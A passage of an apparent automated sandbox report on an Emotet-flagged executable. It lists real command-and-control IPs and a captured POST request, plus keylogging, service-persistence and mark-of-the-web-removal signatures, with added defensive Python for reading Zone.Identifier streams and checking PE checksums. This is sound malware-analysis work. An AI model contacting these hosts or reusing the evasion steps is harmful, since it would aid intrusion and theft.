","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1
a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":378738486,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6","PackageId":"07a1d8a1-8397-e482-20a2-bffb37866c1e-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000007.00000003.752939030.0000028A6801D000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: unknown HTTP traffic detected: POST /WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------FmCOHZhPaWdjvqUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4660Cache-Control: no-cache
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp String found in binary or memory: http://200.59.6.174/yPC1zpa/agcnXrpX/
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp String found in binary or memory: http://200.59.6.174/yPC1zpa/agcnXrpX/0d6H
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933904414.0000000002AA0000.00000004.00000001.sdmp String found in binary or memory: http://200.59.6.174/yPC1zpa/agcnXrpX/q6G
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933922134.0000000002AAF000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933922134.0000000002AAF000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/Y
Source: Windows.StateRepositoryClient.exe, 00000002.00000002.933922134.0000000002AAF000.00000004.00000001.sdmp String found in binary or memory: http://59.148.253.194:8080/WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/w
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000007.00000003.755160807.0000028A67B3E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: http://www.hulu.com/terms
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758782858.0000028A67B63000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: https://instagram.com/hiddencity_
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 00000007.00000003.751991145.0000028A67B65000.00000004.00000001.sdmp String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000007.00000003.758829983.0000028A67B96000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.758618013.0000028A67B6C000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00405C24 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 0_2_00405C24
Note that 0_2_00405C24 lies in the on-disk carrier image (the 0x0040xxxx range of TabbedViewPrj.exe), not in the unpacked regions at 0x0213xxxx and 0x022Axxxx where the Emotet code functions listed below were found, and four GetKeyState reads before a SendMessageW is also how ordinary GUI code checks modifier keys, so this signature is weak evidence on its own.
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00405C24 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 2_2_00405C24

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000000.00000002.684687959.0000000002234000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.933157182.00000000022C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.933217408.0000000002324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.684411365.0000000002130000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Creates files inside the system directory
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File created: C:\Windows\SysWOW64\mfdvdec\
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File deleted: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe:Zone.Identifier
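The stream deleted here is the mark-of-the-web that Windows attaches to downloaded files, and its absence on the copy under SysWOW64 is what the "Hides that the sample has been downloaded from the Internet" signature keys on. The Python below is an added example, not part of this report or of the sample: it parses the stream's INI-style content, classifies the zone, and on Windows reads it straight from a file's alternate data stream. The sample stream text and the URLs in it are constructed for the demonstration.

```python
import os

# Constructed Zone.Identifier stream, shaped like the one Windows writes for a
# browser download (ZoneId=3 is URLZONE_INTERNET); the URLs are placeholders.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/\r\n"
    "HostUrl=https://example.invalid/downloads/invoice.exe\r\n"
)

ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "Trusted", 3: "Internet", 4: "Restricted"}
ZONE_STREAM = ":Zone.Identifier"


def parse_zone_identifier(text: str) -> dict:
    """Parse the INI-style Zone.Identifier content into a dict.

    Only keys inside [ZoneTransfer] count; ZoneId is converted to int and a
    ZoneName is added for readability. Malformed lines are skipped rather
    than raised on, since the stream is attacker-influenced data."""
    fields = {}
    in_zone_transfer = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_zone_transfer = line[1:-1].lower() == "zonetransfer"
            continue
        if in_zone_transfer and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    if "ZoneId" in fields:
        try:
            fields["ZoneId"] = int(fields["ZoneId"])
        except ValueError:
            del fields["ZoneId"]
        else:
            fields["ZoneName"] = ZONE_NAMES.get(fields["ZoneId"], "Unknown")
    return fields


def came_from_internet(fields: dict) -> bool:
    """True for the Internet (3) and Restricted (4) zones, the values that make
    SmartScreen and Office Protected View treat the file as untrusted."""
    return fields.get("ZoneId") in (3, 4)


def read_mark_of_the_web(path: str):
    """Read and parse a file's Zone.Identifier alternate data stream.

    Only NTFS on Windows has the stream, so this returns None elsewhere and
    when the stream is missing; for a file known to have been downloaded,
    None is exactly the artefact this report's sample leaves behind."""
    if os.name != "nt":
        return None
    try:
        with open(path + ZONE_STREAM, encoding="utf-8", errors="replace") as stream:
            return parse_zone_identifier(stream.read())
    except OSError:
        return None


if __name__ == "__main__":
    parsed = parse_zone_identifier(SAMPLE_STREAM)
    print(parsed, "internet download:", came_from_internet(parsed))
```

On a live host, `read_mark_of_the_web` returning None for the copy under `C:\Windows\SysWOW64\mfdvdec\` while the original on the Desktop still carries ZoneId=3 is the on-disk trace of this behaviour. The deletion itself is only visible through API monitoring, as in this report: Sysmon's FileCreateStreamHash event (ID 15) records the stream being created, not removed.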
Detected potential crypto function
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041A09A 0_2_0041A09A
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041426E 0_2_0041426E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0040759C 0_2_0040759C
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004135B9 0_2_004135B9
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0041468E 0_2_0041468E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_004246B6 0_2_004246B6
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00425A12 0_2_00425A12
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00413A8E 0_2_00413A8E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00422B43 0_2_00422B43
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00413E62 0_2_00413E62
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00423FBE 0_2_00423FBE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A8220 0_2_022A8220
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A7EA0 0_2_022A7EA0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A7640 0_2_022A7640
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A64C0 0_2_022A64C0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A1B80 0_2_022A1B80
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02139A3E 0_2_02139A3E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213E02F 0_2_0213E02F
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213805E 0_2_0213805E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_021391DE 0_2_021391DE
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213371E 0_2_0213371E
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213DFFB 0_2_0213DFFB
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0213E4AF 0_2_0213E4AF
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_02139DBE 0_2_02139DBE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_0041A09A 2_2_0041A09A
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_0041426E 2_2_0041426E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_0040759C 2_2_0040759C
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_004135B9 2_2_004135B9
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_0041468E 2_2_0041468E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_004246B6 2_2_004246B6
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00425A12 2_2_00425A12
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00413A8E 2_2_00413A8E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00422B43 2_2_00422B43
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00413E62 2_2_00413E62
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_00423FBE 2_2_00423FBE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B8220 2_2_023B8220
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B7640 2_2_023B7640
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B64C0 2_2_023B64C0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B1B80 2_2_023B1B80
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B7EA0 2_2_023B7EA0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C9A3E 2_2_022C9A3E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022CE02F 2_2_022CE02F
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C805E 2_2_022C805E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C91DE 2_2_022C91DE
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C371E 2_2_022C371E
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022CDFFB 2_2_022CDFFB
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022CE4AF 2_2_022CE4AF
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_022C9DBE 2_2_022C9DBE
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: String function: 00412D94 appears 59 times
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: String function: 00413362 appears 98 times
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: String function: 00412D94 appears 59 times
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: String function: 00413362 appears 98 times
PE file contains strange resources
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.683441978.000000000043D000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTabbedViewPrj.exeJ vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.686067714.0000000002A10000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.686303858.0000000002B10000.00000002.00000001.sdmp Binary or memory string: originalfilename vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe, 00000000.00000002.686303858.0000000002B10000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Binary or memory string: OriginalFilenameTabbedViewPrj.exeJ vs 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: classification engine Classification label: mal64.troj.evad.winEXE@7/0@0/2
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: OpenSCManagerW,CreateServiceW,_snwprintf,CloseServiceHandle,CloseServiceHandle, 0_2_022A87A0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B4C70 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32NextW,Process32NextW,Process32FirstW,FindCloseChangeNotification, 2_2_023B4C70
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_0040C0F2 FindResourceW,LoadResource,LockResource,FreeResource, 0_2_0040C0F2
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A5040 ChangeServiceConfig2W,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,OpenServiceW,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle, 0_2_022A5040
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe 'C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Process created: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_CURSOR
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_BITMAP
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_ICON
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_MENU
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_DIALOG
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_STRING
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_ACCELERATOR
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: section name: RT_GROUP_ICON
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\BEAUREGARD\Music\TabbedViewPrj\TabbedViewPrj\Release\TabbedViewPrj.pdb source: 8e1c4bf4d7639eeb253500f744cbbff5.exe
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_00401D89 __EH_prolog3,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,CreateDirectoryA,VirtualAlloc,CreateDirectoryA, 0_2_00401D89
PE file contains an invalid checksum
Source: 8e1c4bf4d7639eeb253500f744cbbff5.exe Static PE information: real checksum: 0xb5168 should be: 0xb56a2
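Both the checksum mismatch recorded above (stored 0xb5168 against a recomputed 0xb56a2) and the run of identical `push ecx; mov dword ptr [esp], imm32` stubs listed under the next signature can be reproduced from the file alone. The Python below is an added example, not code from this report or from the sample: it implements the image checksum that imagehlp's CheckSumMappedFile computes, checks it against the header, and scans a code blob for the stub byte pattern (`51 C7 04 24 imm32`) to harvest the immediates. The minimal PE image and the code blob it runs on are constructed for the test. The report does not say what the constants are; thunks of this shape that all feed one routine are where hashed API lookups usually keep their hashes, which is why harvesting them is a useful first step.

```python
import struct

OPT_HDR_CHECKSUM = 0x40                 # CheckSum offset within the optional header
STUB_PREFIX = b"\x51\xc7\x04\x24"        # push ecx ; mov dword ptr [esp], imm32


def locate_checksum_field(image: bytes) -> int:
    """File offset of OptionalHeader.CheckSum, after checking the MZ/PE magic."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
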